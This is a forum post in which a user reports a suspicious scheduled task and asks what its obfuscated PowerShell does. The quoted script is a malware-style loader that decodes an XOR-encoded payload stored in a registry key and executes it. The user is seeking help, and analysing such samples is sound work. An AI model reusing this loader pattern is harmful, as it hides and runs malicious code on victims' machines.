E
ErichBrutus
I had a somewhat suspicious task scheduled called "jojLNs" for some reason, it was tasked to run a powershell script in System32, the contents of which look something like this: $BeGAuVtuCJ=[ScriptBlock];$nXopPKHXZuvg=[string];$RFmkrqWtsy=[char]; icm ($BeGAuVtuCJ::Create($nXopPKHXZuvg::Join('', ((gp 'HKLM:\SOFTWARE\DefaultUserEnvironment03ZVQpAT').'6YoArxq' | % { ($_ -bxor (27+16+8+74+21+21+3+0+0+2+3+1)) -as $RFmkrqWtsy }))))Can anyone please tell what it was doing and was it harmful in any way?
Continue reading...
Continue reading...